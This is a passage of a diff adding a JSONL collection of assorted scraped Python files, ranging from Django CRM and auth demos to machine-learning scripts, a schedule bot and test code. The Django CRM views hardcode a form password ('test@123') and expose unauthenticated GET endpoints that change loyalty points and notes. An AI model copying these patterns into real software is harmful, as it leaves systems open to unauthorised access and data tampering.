diff --git "a/481.jsonl" "b/481.jsonl" new file mode 100644--- /dev/null +++ "b/481.jsonl" @@ -0,0 +1,703 @@ +{"seq_id":"462251803","text":"import json\nimport os\nimport pickle\nfrom . import filters\nimport requests\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, get_object_or_404\n# Create your views here.\nfrom django.views.generic import ListView, CreateView\nfrom jsignature.utils import draw_signature\nfrom django.core.files import File # you need this somewhere\nfrom Khurram_website import settings\nfrom django.template.loader import render_to_string\nfrom crm import forms, models\nfrom .models import Crm_Form, WpUsers\nfrom django.contrib import messages\nfrom django.views.generic.edit import UpdateView\n\ndef index(request):\n \n return render(request,'index.html')\n\n\n\n\n\nclass CRMFormView(CreateView):\n fields = ('user','usr','address','post_code','mobile_number','nearest_clinique','Treatment_intensity','address','GP_Name','GP_Address','Allergies','medical_condition','current_medical_treatment','medical_devices','counter_mediations','tatoos_permanent','pregnancy_or_breeding')\n model = Crm_Form\n template_name = 'crm/form.html'\n\ndef search_customers(request):\n request_dict = {}\n crm_forms = models.Crm_Form.objects\n try:\n value = request.GET['val']\n request_dict['search_field'] = value\n values = filters.customer_filter(value).order_by('full_name')\n \n available_forms = [crm_forms.get(customer__id=i.id) if len(crm_forms.filter(customer__id=i.id)) else False for i\n in values]\n \n mydict = zip(values, available_forms)\n request_dict['form'] = mydict\n return render(request, 'crm/customer_result.html', request_dict)\n\n except Exception as e:\n print(e)\n # values = models.WpBooklyCustomers.objects.all()\n # available_forms = [crm_forms.get(customer__id=i.id) if len(crm_forms.filter(customer__id=i.id)) else False for i in values]\n # mydict = zip(values,available_forms)\n \n # request_dict['form'] = mydict\n return render(request, 'crm/all_customers.html', request_dict)\n\n\ndef customer_profile(request, id):\n try:\n customers = models.WpBooklyCustomers.objects.get(pk=id)\n info = json.loads(customers.info_fields)\n ids_val = {}\n for i in info:\n ids_val[i['id']] = i['value']\n returndict = {'customer': customers}\n returndict['allow_phone'] = ids_val['94000'] if '94000' in ids_val else ''\n returndict['preffered_location'] = ids_val['24210'] if '24210' in ids_val else ''\n returndict['treatment_interested'] = ids_val['60317'] if '60317' in ids_val else ''\n returndict['hear_source'] = ids_val['1935'] if '1935' in ids_val else ''\n except Exception as e:\n returndict = {'error':\"Customer don't exist\"}\n returndict['id'] = id\n loyality = models.LoyalityPoints.objects.filter(customer_id=id).order_by('-pk')\n returndict['loyality_objects'] = loyality\n return render(request,'crm/customer_profile.html',returndict)\n\n'''def crm_form_update(request,id):\n\tmodel = models.Crm_Form.objects.get(customer__id=id)\n\tform = forms.crm_form_full(model)\n\treturn render(request,'crm/crm_form.html',{'form':form})\n'''\ndef crm_form_get(request):\n if request.method =='GET':\n try:\n arg = request.GET['customer']\n try:\n form = forms.crm_form_full2(instance=models.Crm_Form.objects.get(customer__id=arg))\n except:\n form = forms.crm_form_full(initial={'customer':arg})\n \n except Exception as e:\n raise e\n arg=''\n skey = request.session.session_key\n request.session.delete(skey)\n \n return 
render(request,'crm/crm_form.html',{'form':form})\n \n elif request.method == 'POST':\n print(request.POST['customer'])\n try:\n instance = models.Crm_Form.objects.get(customer__id=request.POST['customer'])\n signature = instance.Signature\n form = forms.crm_form_full2(request.POST or None,instance=instance)\n if form.is_valid():\n password = form.cleaned_data.get('Password')\n if password != 'test@123':\n return render(request, 'crm/crm_form.html',\n {'form': form, 'message': 'Password didn\\'t given or invalid'})\n form = form.save(commit=False)\n form.Signature = signature\n form.save()\n return render(request,'crm/crm form success.html')\n else:\n print(form.errors)\n return render(request, 'crm/crm_form.html', {'form': form})\n \n \n except Exception as e:\n \n form = forms.crm_form_full(request.POST)\n \n if form.is_valid():\n signature = form.cleaned_data.get('Signature')\n password = form.cleaned_data.get('Password')\n if password != 'test@123':\n \n return render(request,'crm/crm_form.html',{'form':form,'message':'Password didn\\'t given or invalid'})\n #\t\t\t\t\tHttpResponse(\"Incorrect Password or Password not supplied\")\n form = form.save(commit=False)\n \n if signature:\n # as an image\n signature_picture = draw_signature(signature)\n form.Signature = signature_picture\n model_id = models.Crm_Form.objects.count()\n pic_name = 'customer-{}.png'.format(model_id)\n signature_picture.save(os.path.join(settings.BASE_DIR, os.path.join('media',\n os.path.join('form_signatures',\n pic_name))))\n form.Signature = os.path.join('form_signatures',\n pic_name)\n \n # if form.is_valid:\n # form.Signature = request.FILES.get('Signature')\n form.save()\n return render(request,'crm/crm form success.html')\n else:\n print(form.errors)\n return render(request, 'crm/crm_form.html', {'form': form})\n#\n\ndef product_sold(request):\n form = forms.Product_sold_form()\n return render(request, 'crm/crm_form.html', {'form': form})\n\ndef add_loyality_points(request,id,value):\n customer = models.WpBooklyCustomers.objects.get(pk=id)\n previous = customer.loyality_points\n val = int(value)\n if previous is None: previous = 0\n customer.loyality_points = previous+val\n customer.save()\n return HttpResponse(customer.loyality_points)\n\ndef update_notes(request):\n try:\n form_id = request.GET['id']\n form_notes_value = request.GET['notes']\n form = get_object_or_404(models.Crm_Form,pk=form_id)\n form.notes = form_notes_value\n form.save()\n return HttpResponse(form_notes_value)\n except Exception as e:\n return HttpResponse(e)","sub_path":"crm/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"7949673","text":"# Copyright (c) 2018 Ultimaker B.V.\n# !/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\nimport logging\nimport os\n\nfrom datetime import timedelta\n\nimport re\nimport sys\nfrom subprocess import check_output, STDOUT, CalledProcessError\nfrom typing import List, Dict, Optional, Iterable, Tuple\n\nfrom Settings import Settings\nfrom curaPrintTimeEstimator.helpers import findModels\n\n\nclass ModelTimeCalculator:\n \"\"\"\n Class responsible for running the cura engine for all models found in the 'models' directory.\n The results are parsed and the expected print time is written to an output file.\n \"\"\"\n\n # which definition files should be used, excluding the .def.json extension.\n DEFINITIONS = (\"fdmprinter\", )\n\n # The file will contain the output of 
the time estimation (see self.gatherPrintTimeData)\n OUTPUT_FILE = \"{}/print_times.json\".format(Settings.PROJECT_DIR)\n\n def __init__(self):\n self.settings = dict(self._findSettings())\n\n @staticmethod\n def run() -> None:\n \"\"\"\n Runs the application.\n \"\"\"\n ModelTimeCalculator().gatherData()\n\n def gatherData(self) -> Dict[str, Dict[str, Dict[str, Optional[int]]]]:\n \"\"\"\n Gathers data about the estimated print time for one model, all settings and all definitions.\n :return: A dict with the format {\n model_name: {\n definition: {settings_name: print_time},\n }\n }.\n \"\"\"\n settings = dict(self._findSettings())\n\n if os.path.exists(self.OUTPUT_FILE):\n with open(self.OUTPUT_FILE) as f:\n result = json.load(f)\n else:\n result = {}\n\n try:\n for model in findModels():\n result[model] = self.gatherPrintTimeData(model, settings, prev_results=result.get(model))\n finally:\n with open(self.OUTPUT_FILE, \"w\") as f:\n json.dump(result, f, indent=2)\n logging.info(\"Results written to %s\", self.OUTPUT_FILE)\n\n return result\n\n @staticmethod\n def _findSettings() -> Iterable[Tuple[str, List[str]]]:\n \"\"\"\n Finds the TXT files available in the 'settings' sub folder.\n :return: An iterable of lists of settings each format: (settings_name, settings_parameters).\n \"\"\"\n directory = \"{}/settings\".format(Settings.PROJECT_DIR)\n files = os.listdir(directory)\n for name in sorted(files):\n if name.endswith(\".txt\"):\n with open(\"{}/{}\".format(directory, name)) as f:\n yield name[:-4], f.read().splitlines()\n\n def gatherPrintTimeData(self, model: str, settings: Dict[str, List[str]],\n prev_results: Optional[Dict[str, Dict[str, Optional[int]]]]\n ) -> Dict[str, Dict[str, Optional[int]]]:\n \"\"\"\n Gathers data about the estimated print time for one model, all settings and all definitions.\n :param model: The name of the model file, including the extension.\n :param settings: A dict with the settings file name and a list of settings for each of the files.\n :return: A dict with the format {definition: {settings_name: print_time}}.\n \"\"\"\n result = prev_results or {}\n for definition in self.DEFINITIONS:\n result.setdefault(definition, {})\n for setting_name, settings_parameters in settings.items():\n if result[definition].get(setting_name):\n logging.info(\"Model %s, definition %s and settings %s was already sliced, %s seconds to print.\",\n model, definition, settings, result[definition][setting_name])\n else:\n result[definition][setting_name] = self.slice(model, definition, settings_parameters)\n return result\n\n def slice(self, model_name: str, definition: str, settings: List[str]) -> Optional[int]:\n \"\"\"\n Runs the slicer, returning the estimated amount of seconds to print the model.\n :param model_name: The name of the model including the extension.\n :param definition: The definition file to be used, without the .def.json extension.\n :param settings: The extra settings to be passed to the engine.\n :return: The amount of seconds Cura expects the printing will take.\n \"\"\"\n logging.info(\"Slicing %s with definition %s and settings %s\", model_name, definition, settings)\n\n arguments = [\n Settings.CURA_ENGINE,\n \"slice\", \"-v\",\n \"-o\", \"NUL\" if sys.platform == \"win32\" else \"/dev/null\",\n \"-j\", os.path.join(Settings.CURA_DIR, \"resources\", \"definitions\", \"{}.def.json\".format(definition)),\n ]\n\n # Add the global settings\n for s in settings:\n arguments.extend([\"-s\", s])\n\n # Add the extruder0 settings\n for s in settings:\n 
arguments.extend([\"-e0\", \"-s\", s])\n\n arguments.extend([\"-e0\", \"-l\", os.path.join(Settings.PROJECT_DIR, \"models\", model_name)])\n\n try:\n output = check_output(arguments, stderr=STDOUT).decode()\n except CalledProcessError as err:\n if b\"Failed to load model:\" in err.output:\n logging.warning(\"Cannot load model %s: %s\", model_name, err.output)\n return None\n else:\n logging.error(err.output)\n raise\n return self._parsePrintTime(output)\n\n @staticmethod\n def _parsePrintTime(cura_output: str) -> int:\n \"\"\"\n Finds the expected print time in the output from the Cura engine.\n See tests/fixtures for examples of the output.\n :param cura_output: The output from the Cura Engine CLI.\n :return: The amount of seconds found in the output.\"\"\"\n search = re.search(r\"Print time: (\\d+)\\r?\\n\", cura_output)\n if not search:\n raise ValueError(\"Cannot parse the cura output {}\".format(cura_output))\n result = int(search.group(1))\n logging.info(\"Model will be printed in %s\", timedelta(seconds=result))\n return result\n","sub_path":"curaPrintTimeEstimator/helpers/ModelTimeCalculator.py","file_name":"ModelTimeCalculator.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"47784464","text":"import cv2\nfrom core.detect import create_mtcnn_net, MtcnnDetector\nimport core.vision as vision\n\n\n\n\nif __name__ == '__main__':\n\n pnet, rnet, onet = create_mtcnn_net(p_model_path=\"./model_store/pnet_epoch_5best.pt\", r_model_path=\"./model_store/rnet_epoch_1.pt\", o_model_path=\"./model_store/onet_epoch_7bbest.pt\", use_cuda=True)\n mtcnn_detector = MtcnnDetector(pnet=pnet, rnet=rnet, onet=onet, min_face_size=24)\n\n img = cv2.imread(\"./test.jpg\")\n b, g, r = cv2.split(img)\n img2 = cv2.merge([r, g, b])\n\n bboxs, landmarks = mtcnn_detector.detect_face(img)\n # print box_align\n\n vision.vis_face(img2,bboxs,landmarks)","sub_path":"test_image.py","file_name":"test_image.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"81057156","text":"import ROOT\n\n\nclass PhysObject:\n def __init__(self, eta, phi, pt, mass, pid = None):\n \"\"\"\n Initializes simple representation of a physics object (track/neutral hadron/photon), containing\n just eta, phi, pt and mass.\n \"\"\"\n \n self.eta = eta\n self.phi = phi\n self.pt = pt\n self.mass = mass if mass is not None else 0\n self.pid = pid\n \n def get_four_vector(self):\n \"\"\"\n Returns ROOT TLorentzVector corresponding to this physics object.\n \"\"\"\n vector = ROOT.TLorentzVector()\n vector.SetPtEtaPhiM(self.pt, self.eta, self.phi, self.mass)\n return vector\n","sub_path":"rootToH5converter/PhysObject.py","file_name":"PhysObject.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"210609960","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\n\"\"\"\n\nimport tensorflow.compat.v1 as tf # ver1.x\ntf.disable_v2_behavior() # ver2.0 사용안함\n\nfrom sklearn.metrics import accuracy_score\n\n# x, y data \n# x : [hours, video]\nx_data = [[1, 2], [2, 3], [3, 1], [4, 3], [5, 3], [6, 2]] # [6,2]\n\n# y : binary data (fail or pass)\ny_data = [[0], [0], [0], [1], [1], [1]] # [6,1]\n\n# x, y 변수 정의\nX = tf.placeholder(dtype = tf.float32 , shape = [None , 2])\nY = tf.placeholder(dtype = tf.float32 , shape = [None , 1])\n\n# w , b\nw = 
tf.Variable(tf.random_normal([2,1]))\nb = tf.Variable(tf.random_normal([1]))\n\n# sigmoid classify\n# (1) model : 예측치 \nmodel = tf.matmul(X, w) + b \nsigmoid = tf.sigmoid(model) \n\n# (2) loss function : Entropy 수식 = -sum(Y * log(model)) \nloss = -tf.reduce_mean(Y * tf.log(sigmoid) + (1-Y) * tf.log(1-sigmoid))\n\n# (3) optimizer \ntrain = tf.train.GradientDescentOptimizer(0.1).minimize(loss) \n\n#(4) cut-off :0.5\ncut_off = tf.cast(sigmoid > 0.5 , tf.float32)\n\n# model training\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n \n feed_data = { X : x_data , Y : y_data }\n \n for step in range(500):\n _, loss_val = sess.run([train , loss] , feed_dict = feed_data)\n \n if (step+1) %50 == 0 :\n print(\"step = {} , loss = {}\".format(step+1 , loss_val))\n\n #model 최적화\n y_true = sess.run(Y , feed_dict = {Y : y_data})\n y_pred = sess.run(cut_off , feed_dict = { X : x_data})\n \n acc = accuracy_score(y_true , y_pred)\n print(\"acc :\" , acc)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"tensorflow/C04_Classification/lecture_1.x/step03_sigmoid_classfy.py","file_name":"step03_sigmoid_classfy.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"219229054","text":"import datetime\r\nrussianName = {\"ru\": \"Русский язык \", \"Ch\": \"Химия\", \"Mat\": \"Математика\", \"Phis\": \"Физика\"}\r\n\r\nteacherName = {\"ru\": \" с НЕКТО\", \"Ch\": \" c некто\", \"Mat\": \" с некто\", \"Phis\": \" с некто\"}\r\ndaysofweek = [\"Понедельник\", \"Вторник\", \"Среда\", \"Четверг\", \"Пятница\"]\r\nlessons = [\r\n [\"ru\", \"ru\", 'Ch', 'Ch', 'Mat', 'Mat'],\r\n [\"ch\", \"Mat\", 'Ch', 'Ch', 'Mat', 'Mat'],\r\n [\"ru\", \"ru\", 'hem', 'hem', 'ath', 'ath'],\r\n [\"Rs\", \"Rs\", 'Cm', 'Cm', 'Mh', 'Mh'],\r\n [\"Rs\", \"Rs\", 'Cm', 'Cm', \"Mat\", 'Mat']\r\n]\r\n\r\ntime = [\"9:00\", \"9:50\", \"10:40\", \"11:00\", \"12:00\", \"13:00\", \"14:00\", \"15:00\", \"16:00\", \"17:00\"]\r\nweday = datetime.datetime.now()\r\n\r\n\r\ndef handle_message(message, nickname=\"\"):\r\n\r\n income = message.split()\r\n day = income[0]\r\n\r\n if day == \"Сегодня\":\r\n answer = lessons[weday.weekday()]\r\n else:\r\n day = daysofweek.index(income[0])\r\n if int(len(income)) == 1:\r\n answer = lessons[day]\r\n else:\r\n\r\n number_of_lesson = int(income[1]) - 1\r\n\r\n currentLesson = lessons[day][number_of_lesson]\r\n\r\n answer = russianName[currentLesson] + teacherName[currentLesson] + \" в \" + time[number_of_lesson]\r\n\r\n return answer\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # dirty python magic, will talk about on the next lesson\r\n # just ignore for now\r\n\r\n nick = input(\"Enter your nickname: \")\r\n\r\n while True:\r\n msg = input(\"Your message: \")\r\n ans = handle_message(msg, nick)\r\n\r\n print(ans)\r\n","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"525709034","text":"# Project 1 : perm_lex.py\n# Hunter Morse\n# CPE 202\n#\n\ndef perm_gen_lex(istring):\n # istring has zero or more lowercase letters in alpha order\n # fn is recursive\n # returns list of strings -- all permutations of input string\n\n# ilist = [letter for letter in istring]\n\n permutations = []\n\n if istring == None:\n raise ValueError\n elif len(istring) == 0:\n return []\n elif len(istring) == 1:\n permutations.append(istring)\n return permutations\n \n for letter_loc in 
range(len(istring)):\n letter = istring[letter_loc]\n endings = istring[:letter_loc] + istring[letter_loc + 1:]\n newPerms = perm_gen_lex(endings)\n# istring.replace(letter, '')\n# endings = perm_gen_lex(istring)\n# for letters in endings:\n# perms.append([letter] + letters)\n for perm in range(len(newPerms)):\n final = letter + newPerms[perm]\n permutations.append(final)\n\n\n\n return permutations\n\n\n\n\n\n\n\n\n","sub_path":"perm_lex.py","file_name":"perm_lex.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"561008609","text":"import keras\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom keras.datasets import mnist\nfrom keras.models import Model\nfrom keras.layers import Input, add\nfrom keras.layers import Layer, Dense, Dropout, Activation, Flatten, Reshape\nfrom keras import regularizers\nfrom keras.regularizers import l2\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D, UpSampling2D, ZeroPadding2D\nfrom keras.utils import np_utils\n\n(X_train, _), (X_test, _) = mnist.load_data()\n\n# 归一化\nX_train = X_train.astype(\"float32\") / 255.\nX_test = X_test.astype(\"float32\") / 255.\n\nprint('X_train shape:', X_train.shape)\nprint(X_train.shape[0], 'train samples')\nprint(X_test.shape[0], 'test samples')\n\n# np.prod是将28X28矩阵转化成1X784,方便全连接神经网络输入层784个神经元读取。\nX_train = X_train.reshape((len(X_train), np.prod(X_train.shape[1:])))\nX_test = X_test.reshape((len(X_test), np.prod(X_test.shape[1:])))\n\ninput_size = 784\nhidden_size = 64\noutput_size = 784\n\nx = Input(shape=(input_size,))\nh = Dense(hidden_size, activation='relu')(x)\nr = Dense(output_size, activation='sigmoid')(h)\n\nautoencoder = Model(inputs=x, outputs=r)\nautoencoder.compile(optimizer='adam', loss='mse')\n\nepochs = 5\nbatch_size = 128\n\nhistory = autoencoder.fit(X_train, X_train, batch_size=batch_size, epochs=epochs, verbose=1,\n validation_data=(X_test, X_test))\n\nconv_encoder = Model(x, h)\nencoded_imgs = conv_encoder.predict(X_test)\n\ndecoded_imgs = autoencoder.predict(X_test)\nn = 10\nplt.figure(figsize=(20, 6))\nfor i in range(6):\n # ax = plt.subplot(3, n, i + 1)\n # plt.imshow(X_test[i].reshape(28, 28))\n # # plt.gray()\n # ax.get_xaxis().set_visible(False)\n # ax.get_yaxis().set_visible(False)\n\n ax = plt.subplot(2, 3, i + 1)\n plt.imshow(encoded_imgs[i].reshape(8, 8).T)\n # plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n\n # ax = plt.subplot(3, n, i + 2 * n + 1)\n # plt.imshow(decoded_imgs[i].reshape(28, 28))\n # # plt.gray()\n # ax.get_xaxis().set_visible(False)\n # ax.get_yaxis().set_visible(False)\nplt.show()\n\nprint(history.history.keys())\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper right')\nplt.show()","sub_path":"自编码器/单层自编码器.py","file_name":"单层自编码器.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"78650473","text":"from django.contrib.auth import authenticate,login,logout\nfrom django.contrib.auth.decorators import login_required,permission_required\nfrom django.shortcuts import render,redirect,reverse\n# from django.contrib.auth.models import User\nfrom django.http import HttpResponse\n# from .models import Person\n# from .models import UserExtension\nfrom .models import User,Article\nfrom .forms import 
LoginForm\nfrom django.contrib.auth.models import ContentType,Permission,Group\n# Create your views here.\ndef index(request):\n # user=User.objects.create_user(username='jxlg2',email='jxlg2@163.com',password='hq123123')#objects是UserManager\n # user=User.objects.create_superuser(username='jxlg1',email='jxlg1@163.com',password='hq123123')#objects是UserManager\n # user.save()\n\n # user=User.objects.get(pk=1)\n # user.set_password('123qwe123')\n\n # username = 'jxlg'\n # password = 'hq123123'\n # user = authenticate(request, username=username, password=password)\n # if user:\n # print('登录成功', user.username)\n # else:\n # print('用户名或密码错误')\n # return HttpResponse(\"OK\")\n return render(request,'index.html')\n# def proxys(request):\n# blacklists=Person.get_black_list()\n# for blacklist in blacklists:\n# print(blacklist)\n# return HttpResponse(\"blacklist\")\n#\n\n\n#\n# def my_authenticate(telephone,password):\n# user=User.objects.filter(extension__telephone=telephone).first()\n# if user:\n# is_correct=user.check_password(password)#方法自带\n# if is_correct:\n# return user\n# else:\n# return None\n# else:\n# return None\n\n#\n#\n# def one_view(request):\n# # user=User.objects.create_user(username='zhangsan',email='zhangsan@qq.com',password='zhangsan123')\n# # user.extension.telephone='13911111111'\n# # user.save()\n#\n# # user=User.objects.create_user(username='lisi',email='lisi@qq.com',password='lisi123')\n# # user.extension.telephone='13922222222'\n# # user.extension.school='清华大学'\n# # user.save()\n#\n# telephone=request.GET.get('telephone')\n# password=request.GET.get('password')\n# user=my_authenticate(telephone,password)\n# if user:\n# print(\"%s:验证成功\"%user.username)\n# else:\n# print(\"验证失败\")\n# return HttpResponse(\"一对一扩展模型\")\n\ndef inherit(request):\n # telephone='13933333333'\n # password='jxlg123'\n # username='jxlg'\n # school='江西理工大学'\n # email='jxlg@qq.com'\n # user=User.objects.create_user(telephone=telephone,username=username,email=email,password=password,school=school)\n # user.save()\n # # user=authenticate(request,telephone='13933333333',password='jxlg123')\n # # if user:\n # # print('验证成功')\n # # else:\n # # print('验证失败')\n\n\n # telephone='13933333333'\n # password='jxlg123'\n # username='jxlg'\n # email='jxlg@qq.com'\n # user=User.objects.create_user(telephone=telephone,username=username,email=email,password=password)\n # user.save()\n user = authenticate(request, username='13933333333', password='jxlg123')\n if user:\n print('验证成功')\n else:\n print('验证失败')\n return HttpResponse(\"模型继承\")\ndef my_login(request):\n if request.method==\"GET\":\n return render(request,'login.html')\n else:\n form=LoginForm(request.POST)\n if form.is_valid():\n telephone=form.cleaned_data.get('telephone')\n password=form.cleaned_data.get('password')\n remember=form.cleaned_data.get('remember')\n user=authenticate(request,username=telephone,password=password)\n\n if user and user.is_active:\n login(request,user)\n if remember:\n request.session.set_expiry(None)\n else:\n request.session.set_expiry(0)\n next_url=request.GET.get('next')\n if next_url:\n return redirect(next_url)\n else:\n return HttpResponse(\"登录成功\")\n else:\n return HttpResponse(\"手机号或密码错误\")\n else:\n print(form.errors.get_json_data())\n return redirect(reverse('login'))\ndef my_logout(request):\n logout(request)\n return redirect(reverse('index'))\n\n\n@login_required(login_url='/login/')\ndef profiles(request):\n return HttpResponse(\"我是个人中心,登录以后才可以查看\")\ndef add_permissions(request):\n #获取模型对应的ContentTypeId\n 
content_type=ContentType.objects.get_for_model(Article)\n permission=Permission.objects.create(codename='black_article',name='拉黑文章',content_type=content_type)\n permission.save()\n return HttpResponse(\"权限创建成功\")\ndef operate_permission(request):\n user=User.objects.first()\n content_type=ContentType.objects.get_for_model(Article)\n permissions=Permission.objects.filter(content_type=content_type)\n\n for permission in permissions:\n print(permission)\n\n user.user_permissions.set(permissions)\n user.save()\n\n # user.user_permissions.clear()\n # user.user_permissions.remove(*permission)\n\n if user.has_perm('front.view_article'):\n print('拥有查看文章的权限')\n else:print('没有查看文章的权限')\n print(user.get_all_permissions())\n\n return HttpResponse(\"操作权限成功\")\n@permission_required(['front.view_article','front.add_article'],login_url='/login/',raise_exception=True)\ndef add_article(request):\n if request.user.is_authenticated:\n print('已经登录了')\n if request.user.has_perm('front.add_article'):\n return HttpResponse(\"添加文章的页面\")\n else:\n return HttpResponse('您没有访问该页面的权限',status=403)\n else:\n return redirect(reverse('login'))\n\ndef operate_group(request):\n # group=Group.objects.create(name=\"运营\")\n # content_type = ContentType.objects.get_for_model(Article)\n # permissions=Permission.objects.filter(content_type=content_type)\n # group.permissions.from_queryset(permissions)\n # group.save()\n\n # user=User.objects.first()\n # group=Group.objects.filter(name='运营').first()\n # user.groups.add(group)\n # user.save()\n\n # user = User.objects.first()\n # permissions=user.get_group_permissions()\n # print(permissions)\n\n user = User.objects.first()\n if user.has_perms(['front.view_article','front.black_article']):#先看自己有没有,再看分组有没有\n print(\"有查看文章 拉黑文章权限\")\n else:\n print(\"没有有查看文章 拉黑文章权限\")\n return HttpResponse(\"操作分组\")","sub_path":"day0624/user_model_demo/front/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"425503811","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 8 20:25:00 2019\n\n@author: robin\n\"\"\"\n\nfrom QCM_utils import load_data, preprocessing\nfrom keras.models import load_model\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nX,Y,classes=load_data()\nnb_classes=len(classes)\nX,Y=preprocessing(X,Y,nb_classes)\nmodel = load_model('results/best_satisfaction_classifier.h5')\nprediction=model.predict(X[:12])\nprediction=np.argmax(prediction,axis=1)\n\nplt.figure()\nfor i,p in enumerate(prediction):\n plt.subplot(3,4,i+1)\n plt.axis('off')\n plt.title(\"Prediction : \"+classes[p])\n plt.imshow(np.reshape(X[i],(12,100)), cmap=\"gray\")\n plt.show() \n","sub_path":"prediction_with_best_model.py","file_name":"prediction_with_best_model.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"86162338","text":"import hfst\nimport re\n\npairs_with_insym = {}\n\nrule_dict_lst = []\nfinality_dict_lst = []\n\ndef dict_rule(rule_fst):\n brule = hfst.HfstBasicTransducer(rule_fst)\n rule_dict = {}\n final_states = set()\n for state in brule.states():\n if brule.is_final_state(state):\n final_states.add(state)\n trans_dict = {}\n for transition in brule.transitions(state):\n insym = transition.get_input_symbol()\n outsym = transition.get_output_symbol()\n target = transition.get_target_state()\n trans_dict[(insym,outsym)] = target\n if insym not 
in pairs_with_insym:\n pairs_with_insym[insym] = set()\n pairs_with_insym[insym].add((insym, outsym))\n rule_dict[state] = trans_dict\n return rule_dict, final_states\n\ndef init(rule_file_name):\n istream = hfst.HfstInputStream(rule_file_name)\n while not (istream.is_eof()):\n fst = istream.read()\n rule_d, final_states = dict_rule(fst)\n rule_dict_lst.append(rule_d)\n finality_dict_lst.append(final_states)\n istream.close()\n return\n\nresult_lst = []\n\ndef search(state_lst, insym_lst, outsym_lst):\n global result_lst\n if not insym_lst:\n for state, finality in zip(state_lst, finality_dict_lst):\n if state not in finality:\n return\n res = \"\".join(outsym_lst)\n result_lst.append(res)\n return\n insym = insym_lst[0]\n pair_set = pairs_with_insym[insym]\n for insym, outsym in pair_set:\n new_state_lst = []\n for state, rule_d in zip(state_lst, rule_dict_lst):\n if (insym, outsym) in rule_d[state]:\n new_state_lst.append(rule_d[state][(insym, outsym)])\n else:\n break\n else:\n new_outsym_lst = outsym_lst.copy()\n new_outsym_lst.append(outsym)\n search(new_state_lst, insym_lst[1:], new_outsym_lst)\n continue\n \n return\n \n\ndef generate(word):\n global result_lst, rule_dict_lst\n result_lst = []\n insym_lst = re.findall(r\"{[^{}]+}|[^{}]\", word)\n start_state_lst = [0 for r in rule_dict_lst]\n search(start_state_lst, insym_lst, [])\n return result_lst\n\nif __name__ == \"__main__\":\n import sys, re\n init(\"ofi-rules.fst\")\n for line_nl in sys.stdin:\n line = line_nl.strip()\n res = generate(line)\n print(\" -> \", res)\n print()\n \n","sub_path":"ofitwol/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"421493592","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import date\nimport time\n\nfrom flask import session\n\nfrom fbone.extensions import db\nfrom fbone.appointment.models import Appointment\n\nfrom fbone.appointment.views import (get_utc_seconds,\n get_local_minutes, appointment_ok)\n\nfrom tests import TestCase\n\n\nclass TestAppointment(TestCase):\n\n name = \"TestName\"\n email = \"testemail@sample.com\"\n timezone = float(-time.timezone/3600)\n message = \"Some kind of test message for calendar.\"\n today = date.today()\n epoch_date = date(1970, 1, 1)\n appointment_times = ((60, 120), (180, 300), (360, 600), (1200, 1440))\n\n def setUp(self):\n super(TestAppointment, self).setUp()\n self.init_some_appointments()\n\n def make_an_appointment(self, start_time, end_time, timezone):\n return Appointment(name=self.name,\n email=self.email,\n start_time=start_time,\n end_time=end_time,\n timezone=self.timezone,\n message=self.message)\n\n def make_an_appointment_dict(self, date, start_time, end_time):\n return dict(name=self.name,\n email=self.email,\n date=date,\n start_time=start_time,\n end_time=end_time,\n timezone=self.timezone,\n message=self.message)\n\n def init_some_appointments(self):\n for start, end in self.appointment_times:\n start_time = get_utc_seconds(self.today, start, self.timezone)\n end_time = get_utc_seconds(self.today, end, self.timezone)\n appointment = self.make_an_appointment(start_time, end_time,\n self.timezone)\n db.session.add(appointment)\n\n db.session.commit()\n\n def test_all_appointments(self):\n resp = self.client.get('/appointment/')\n self.assertEqual(resp.mimetype, 'application/json')\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.json['timezone'], 0.0)\n 
